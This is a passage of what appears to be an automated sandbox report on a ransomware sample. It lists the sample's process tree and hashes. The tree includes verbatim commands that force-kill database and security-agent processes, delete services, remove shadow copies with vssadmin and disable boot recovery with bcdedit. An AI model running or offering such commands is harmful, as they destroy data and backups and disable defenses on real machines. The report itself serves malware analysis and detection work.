C:\Windows\SysWOW64\sc.exesc delete RTCASMCU5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete FTA5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MASTER5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete NscAuthService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MSCRMUnzipService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MSCRMAsyncService$maintenance5⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @taskkill /IM tv_w32.exe /F & @taskkill /IM tv_x64.exe /F & @taskkill /IM rdm.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM SecureCRTPortable.exe /F & @taskkill /IM VirtualBox.exe /F & @taskkill /IM VBoxSVC.exe /F & @taskkill /IM VirtualBoxVM.exe /F & @taskkill /IM abs_deployer.exe /F & @taskkill /IM edr_monitor.exe /F & @taskkill /IM sfupdatemgr.exe /F & @taskkill /IM ipc_proxy.exe /F & @taskkill /IM edr_agent.exe /F & @taskkill /IM edr_sec_plan.exe /F & @taskkill /IM sfavsvc.exe /F & @taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F & @taskkill /IM DataShareBox.ShareBoxService.exe /F & @taskkill /IM Jointsky.CloudExchangeService.exe /F & @taskkill /IM Jointsky.CloudExchange.NodeService.ein /F & @taskkill /IM perl.exe /F & @taskkill /IM java.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM TsServer.exe /F & @taskkill /IM AppMain.exe /F & @taskkill /IM easservice.exe /F & @taskkill /IM Kingdee6.1.exe /F & @taskkill /IM QyKernel.exe /F & @taskkill /IM QyFragment.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM ComputerZTray.exe /F & @taskkill /IM ComputerZService.exe /F & @taskkill /IM ClearCache.exe /F & @taskkill /IM ProLiantMonitor.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM bugreport.exe /F & @taskkill /IM GNWebServer.exe /F & @taskkill /IM UI0Detect.exe /F & @taskkill /IM GNCore.exe /F & @taskkill /IM gnwayDDNS.exe /F & @taskkill /IM GNWebHelper.exe /F & @taskkill /IM php-cgi.exe /F & @taskkill /IM ESLUSBService.exe /F & @taskkill /IM CQA.exe /F & @taskkill /IM Kekcoek.pif /F & @taskkill /IM Tinuknx.exe /F & @taskkill /IM servers.exe /F & @taskkill /IM ping.exe /F & @taskkill /IM TianHeng.exe /F & @taskkill /IM K3MobileService.exe /F & @taskkill /IM VSSVC.exe /F & @taskkill /IM Xshell.exe /F & @taskkill /IM XshellCore.exe /F & @taskkill /IM FNPLicensingService.exe /F & @taskkill /IM XYNTService.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM EISService.exe /F & @taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F & @taskkill /IM yonyou.u8.gc.taskmanager.servicebus.exe /F & @taskkill /IM U8KeyManagePool.exe /F & @taskkill /IM U8MPool.exe /F & @taskkill /IM U8SCMPool.exe /F & @taskkill /IM UFIDA.U8.Report.SLReportService.exe /F & @taskkill /IM U8TaskService.exe /F & @taskkill /IM U8TaskWorker.exe /F & @taskkill /IM U8WebPool.exe /F & @taskkill /IM U8AllAuthServer.exe /F & @taskkill /IM UFIDA.U8.UAP.ReportService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.Services.exe /F & @taskkill /IM U8WorkerService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.exe /F & @taskkill /IM ShellStub.exe /F & @taskkill /IM U8UpLoadTask.exe /F & @taskkill /IM UfSysHostingService.exe /F & @taskkill /IM UFIDA.UBF.SystemManage.ApplicationService.exe /F & @taskkill /IM UFIDA.U9.CS.Collaboration.MailService.exe /F & @taskkill /IM NotificationService.exe /F & @taskkill /IM UBFdevenv.exe /F & @taskkill /IM UFIDA.U9.SystemManage.SystemManagerClient.exe /F & @taskkill /IM mongod.exe /F & @taskkill /IM SpusCss.exe /F & @taskkill /IM UUDesktop.exe /F & @taskkill /IM KDHRServices.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.Mobile.Servics.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM KDSvrMgrService.exe /F & @taskkill /IM pdfServer.exe /F & @taskkill /IM pdfspeedup.exe /F & @taskkill /IM SufAppServer.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.K3.Mobile.LightPushService.exe /F & @taskkill /IM iMTSSvcMgr.exe /F & @taskkill /IM kdmain.exe /F & @taskkill /IM KDActMGr.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM K3ServiceUpdater.exe /F & @taskkill /IM Aua.exe /F & @taskkill /IM iNethinkSQLBackup.exe /F & @taskkill /IM auaJW.exe /F & @taskkill /IM Scheduler.exe /F & @taskkill /IM bschJW.exe /F & @taskkill /IM SystemTray64.exe /F & @taskkill /IM OfficeDaemon.exe /F & @taskkill /IM OfficeIndex.exe /F & @taskkill /IM OfficeIm.exe /F & @taskkill /IM iNethinkSQLBackupConsole.exe /F & @taskkill /IM OfficeMail.exe /F & @taskkill /IM OfficeTask.exe /F & @taskkill /IM OfficePOP3.exe /F & @taskkill /IM apache.exe /F & @taskkill /IM GnHostService.exe /F /T & @taskkill /IM HwUVPUpgrade.exe /F /T & @taskkill /IM "Kingdee.KIS.UESystemSer.exe" /F /T & @taskkill /IM uvpmonitor.exe /F /T & @taskkill /IM UVPUpgradeService.exe /F /T & @taskkill /IM KDdataUpdate.exe /F /T & @taskkill /IM Portal.exe /F /T & @taskkill /IM U8SMSSrv.exe /F /T & @taskkill /IM "Ufida.T.SM.PublishService.exe" /F /T & @taskkill /IM lta8.exe /F /T & @taskkill /IM UfSvrMgr.exe /F /T & @taskkill /IM AutoUpdateService.exe /F /T & @taskkill /IM MOM.exe /F /T"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VBoxSDS.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM mysqld.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TeamViewer_Service.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TeamViewer.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM CasLicenceServer.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM tv_w32.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM tv_x64.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM rdm.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SecureCRT.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SecureCRTPortable.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VirtualBox.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VBoxSVC.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VirtualBoxVM.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM abs_deployer.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM edr_monitor.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sfupdatemgr.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ipc_proxy.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM edr_agent.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM edr_sec_plan.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sfavsvc.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DataShareBox.ShareBoxMonitorService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DataShareBox.ShareBoxService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Jointsky.CloudExchangeService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Jointsky.CloudExchange.NodeService.ein /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM perl.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM java.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM emagent.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TsServer.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AppMain.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM easservice.exe /F5⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services""4⤵
-
C:\Windows\SysWOW64\sc.exesc delete OracleOraDb11g_home1ClrAgent5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleOraDb11g_home1TNSListener5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleServiceORCL5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleVssWriterORCL5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete aspnet_state @sc delete Redis5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleVssWriterORCL5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ImeDictUpdateService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete JhTask5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete XT800Service_Personal5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MCService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ImeDictUpdateService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete allpass_redisservice_port211605⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "Flash Helper Service"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "Kiwi Syslog Server"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "UWS HiPriv Services"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "DAService_TCP"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "eCard-TTransServer"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete eCardMPService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete EnergyDataService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete UI0Detect5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop xenlite6⤵
-
-
-
C:\Windows\SysWOW64\sc.exesc delete WebAttendServer5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete TCPIDDAService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ServiceMid6⤵
-
-
-
C:\Windows\SysWOW64\sc.exesc delete K3MobileService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete UIODetect5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "wanxiao-monitor"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete VMAuthdService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete VMUSBArbService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete VMwareHostd5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "vm-agent"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete VmAgentDaemon5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OpenSSHd5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete eSightService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete apachezt5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete Jenkins5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete secbizsrv5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete SQLTELEMETRY5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\sc.exesc delete MSMQ5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete smtpsvrJT5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete zyb_sync5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete 360EntHttpServer5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\sc.exesc delete 360EntSvc5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete 360EntClientSvc5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete NFWebServer5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete wampapache5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\sc.exesc delete MSSEARCH5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete msftesql5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "SyncBASE Service"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleDBConcoleorcl5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleJobSchedulerORCL5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleMTSRecoveryService5⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""4⤵
-
C:\Windows\SysWOW64\sc.exesc delete SQLSERVERAGENT5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete SQLWriter5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MSSQLFDLauncher5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete SQLBrowser5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MSSQLSERVER5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete QcSoftService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MSSQLServerOLAPService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete VMTools5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete VGAuthService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MSDTC5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete TeamViewer5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ReportServer5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete RabbitMQ5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "AHS SERVICE"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sense Shield Service"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete SSMonitorService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete SSSyncService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete TPlusStdAppService13005⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MSSQL$SQL20085⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete SQLAgent$SQL20085⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete TPlusStdTaskService13005⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete TPlusStdUpgradeService13005⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ClickToRunSvc6⤵
-
-
-
C:\Windows\SysWOW64\sc.exesc delete VirboxWebServer5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\sc.exesc delete jhi_service5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\sc.exesc delete LMS5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "FontCache3.0.0.0"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "OSP Service"5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\RegAsm.exe2⤵
- Executes dropped EXE
- Modifies extensions of user files
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssadmin.exe"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures3⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} bootstatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c bcdedit /set {current} recoveryenabled no3⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} recoveryenabled no4⤵
- Modifies boot configuration data using bcdedit
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2068983001083099271205706591149230951513146020241723112464-20840918011943937378"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "182284473442738669-756477640-1443184106-1621301948-140653284317380402471730647231"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-58310004615409243092134880172-296471503662060705570309398-394985187-1985866473"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2045284664-315220239-9435209481091545959988669240-873656541563489667-1153452222"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1475871968-2138289168182407845315702160417535227891191730324-188078883285318172"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-156301831219656678781306404878-1654138781-17132658181266650791-797478817-1504240584"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-345437780-782954566813228460-546010726-602834746528507592-789921846-1757963189"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1333266436-1223821103127091055912701175-1309652056451110959220124884-472564185"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1145553636-9840077213388951681086580869-877561187236370301-1644229309-1538843518"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1363766416863211402-987307161-1358849566841518709490194243-13454270881883946723"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-10240546461358594332-7566987811791711778-75316954-1429389673-1469904337576828785"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1527102612840701519-737210216-1317773988-11705364011912547923-759570549895344240"1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMUSBArbService1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mysqltransport1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Synology Drive VSS Service x64"1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSComplianceAudit1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wanxiao-monitor1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop XenSvc1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FirebirdGuardianDeafaultInstance1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NFLicenceServer1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
MD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
MD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
MD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
MD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
MD5
bbeb123d32ea9ee82dd4f56ee7727ebf
SHA10675c022255a47d904ee7aa2de5270a59b657c8d
SHA2562592c02f8ba88b44b465a5f5dceefd8ecbff7e948ee5338087064e75ca6f4cd3
SHA5120a997f100e7af02c09def02540e9d820e9386138d7458696f7a267c8450b69236da567b91a0d0b192aae950aee7e20303b9b52ba12aaf1442ecef68b115fc50f
-
MD5
b58b926c3574d28d5b7fdd2ca3ec30d5
SHA1d260c4ffd603a9cfc057fcb83d678b1cecdf86f9
SHA2566e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3
SHA512b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab
-
MD5
b58b926c3574d28d5b7fdd2ca3ec30d5
SHA1d260c4ffd603a9cfc057fcb83d678b1cecdf86f9
SHA2566e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3
SHA512b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab
-
MD5
2344be6e63dae60033c3068afa052661
SHA12dc65c6e06c169328a821f8c1ca6ec0f9ef09f32
SHA2560ff224e9b2c4b06a1ff15174582e6b7d788b1db5b2c689cab24df85189c272e5
SHA512a66796e8b2bc5243832d28adda292e4f833bd3894bef3b7da9ac6c397a0fe2cda424834f4dac5956fdabe6869664772a7647720e3f0502ea28fabba3e72eb9e6
-
MD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
MD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
MD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
MD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
MD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
MD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
MD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
MD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
MD5
b58b926c3574d28d5b7fdd2ca3ec30d5
SHA1d260c4ffd603a9cfc057fcb83d678b1cecdf86f9
SHA2566e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3
SHA512b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab
-
MD5
b58b926c3574d28d5b7fdd2ca3ec30d5
SHA1d260c4ffd603a9cfc057fcb83d678b1cecdf86f9
